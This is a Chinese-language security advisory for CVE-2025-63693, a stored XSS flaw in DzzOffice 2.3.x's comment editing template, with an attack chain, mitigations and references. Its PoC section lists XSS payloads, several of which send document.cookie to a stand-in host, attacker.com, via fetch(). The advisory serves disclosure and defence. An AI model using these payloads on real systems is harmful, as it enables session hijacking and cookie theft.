CVE-2025-63693 DzzOffice评论编辑模板XSS漏洞

漏洞信息

漏洞编号

CVE-2025-63693

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

DzzOffice 2.3.x

漏洞概述

CVE-2025-63693是DzzOffice协作办公系统中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于评论编辑功能模块，具体涉及文件dzz/comment/template/edit_form.htm。由于该模板在处理用户可控数据时缺乏充分的安全转义处理，特别是在HTML和JavaScript字符串上下文中未能进行适当的输出编码，导致攻击者可以注入恶意脚本代码。攻击者以低权限用户身份即可构造包含恶意JavaScript代码的评论内容或特制的请求参数，当受害者打开评论编辑弹窗时，注入的恶意代码会在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题，对系统安全性造成威胁。

技术细节

该漏洞的根本原因在于DzzOffice 2.3.x的评论编辑模板文件(dzz/comment/template/edit_form.htm)对用户输入数据的安全处理不足。在Web应用程序中，当用户提交的数据需要在HTML页面中展示时，必须进行适当的转义处理以防止XSS攻击。然而，该模板在多个上下文中（包括HTML标签属性值、JavaScript字符串等）直接输出用户可控的数据，而未进行必要的HTML实体编码或JavaScript转义。攻击者可以利用评论编辑功能，构造包含特殊字符和JavaScript代码的Payload，如<script>alert(document.cookie)</script>或通过事件处理器属性如onerror、onload等触发JavaScript执行。由于评论内容会被存储在数据库中并多次展示，所有访问该评论的用户都可能成为受害者，形成存储型XSS攻击。攻击的利用门槛较低，仅需低权限账户即可实施，且需要用户交互（打开编辑弹窗）才能触发。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标系统使用DzzOffice 2.3.x版本，并确认评论编辑功能存在

STEP 2

初始访问

攻击者以低权限用户身份登录系统，获得基本的评论权限

STEP 3

Payload构造

攻击者构造包含恶意JavaScript代码的评论内容，如使用<script>标签、事件处理器或JavaScript URI

STEP 4

漏洞注入

通过评论编辑功能提交恶意Payload，由于缺乏输入验证和输出转义，恶意代码被存储到数据库

STEP 5

触发条件

当受害者访问包含恶意评论的页面并打开编辑弹窗时，浏览器解析并执行注入的JavaScript代码

STEP 6

攻击成功

攻击者成功在受害者浏览器上下文中执行任意JavaScript，可窃取Cookie、会话令牌或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-63693 DzzOffice XSS -->
<!-- Attack Vector: Stored XSS via comment editing template -->

<!-- Method 1: Script tag injection -->
<script>alert('XSS CVE-2025-63693')</script>

<!-- Method 2: Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: JavaScript URI in anchor -->
<a href="javascript:fetch('https://attacker.com/log?data='+btoa(document.cookie))">Click me</a>

<!-- Method 4: SVG-based injection -->
<svg/onload=fetch('https://attacker.com/cookie?c='+encodeURIComponent(document.cookie))>

<!-- Exploitation Steps: -->
<!-- 1. Create/edit a comment with above payload -->
<!-- 2. Wait for victim to open the edit popup -->
<!-- 3. Payload executes in victim's browser context -->

影响范围

DzzOffice 2.3.x < 2.3.1

DzzOffice 2.3.0及以下版本

防御指南

临时缓解措施

在官方补丁发布前，可临时采取以下措施：1)限制低权限用户的评论功能权限；2)在Web应用防火墙(WAF)中配置XSS防护规则；3)对评论内容实施严格的输入过滤和验证；4)启用浏览器的XSS过滤器作为临时防护；5)监控异常评论提交行为；6)考虑临时禁用评论编辑弹窗功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63693
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63693
3 Details https://www.cvedetails.com/cve/CVE-2025-63693/
4 VulDB https://vuldb.com/cve/CVE-2025-63693
5 Link https://github.com/Yohane-Mashiro/dzzoffice_xss
6 Link https://github.com/zyx0814/dzzoffice/issues/363